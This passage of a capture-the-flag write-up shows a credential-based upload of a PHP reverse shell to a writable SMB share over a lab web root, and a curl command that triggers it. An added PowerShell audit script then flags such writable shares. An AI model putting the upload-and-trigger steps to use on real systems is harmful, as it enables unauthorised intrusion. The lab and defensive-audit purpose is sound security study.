Arbitrary File Upload
The compromised thecybergeek user has write access to the WebApp share, which mirrors the web root directory of the target web application.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ smbclient //craft.offsec/WebApp -U 'thecybergeek%winniethepooh' -c 'prompt; put shell.php'
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
putting file shell.php as \shell.php (114.9 kb/s) (average 114.9 kb/s)
PHP reverse shell payload uploaded
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ curl -s http://craft.offsec/shell.php
Invoking..
Initial foothold established on the CRAFT2 host as the apache account via arbitrary file upload.
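The root cause above is an SMB share over the web root that a non-administrative account can write to. The following audit script is an added example, not part of the original write-up, that flags such shares on a Windows web server; the `$WebRoot` default is a placeholder and the `$TrustedAccounts` list is an assumption to adjust per host.

```powershell
# Added example: find SMB shares that overlap the web root and grant
# write-capable access to accounts outside a trusted list.
# ASSUMPTION: $WebRoot is a placeholder; set it to the server's DocumentRoot.
param(
    [string]$WebRoot = 'C:\path\to\webroot',
    [string[]]$TrustedAccounts = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')
)

function Test-PathOverlap {
    # True when one path equals, contains, or is contained by the other.
    # A share on a parent directory exposes the web root just as well.
    param([string]$Left, [string]$Right)
    $l = $Left.TrimEnd('\') + '\'
    $r = $Right.TrimEnd('\') + '\'
    $cmp = [System.StringComparison]::OrdinalIgnoreCase
    return $l.StartsWith($r, $cmp) -or $r.StartsWith($l, $cmp)
}

$findings = foreach ($share in Get-SmbShare -Special $false) {
    # Skip shares without a filesystem path (e.g. print or IPC shares).
    if (-not $share.Path) { continue }
    if (-not (Test-PathOverlap $share.Path $WebRoot)) { continue }

    Get-SmbShareAccess -Name $share.Name |
        Where-Object {
            "$($_.AccessControlType)" -eq 'Allow' -and
            "$($_.AccessRight)" -in 'Full', 'Change' -and
            $_.AccountName -notin $TrustedAccounts
        } |
        ForEach-Object {
            [pscustomobject]@{
                Share   = $share.Name
                Path    = $share.Path
                Account = $_.AccountName
                Right   = "$($_.AccessRight)"
            }
        }
}

if ($findings) {
    # Each row is an account that can drop files the web server may execute.
    $findings | Format-Table -AutoSize
} else {
    Write-Output "No writable shares overlap $WebRoot for untrusted accounts."
}
```

Share permissions are only half of the check: effective access is the intersection of the share ACL and the NTFS ACL on the directory, so any finding should be confirmed against `Get-Acl` output for the same path.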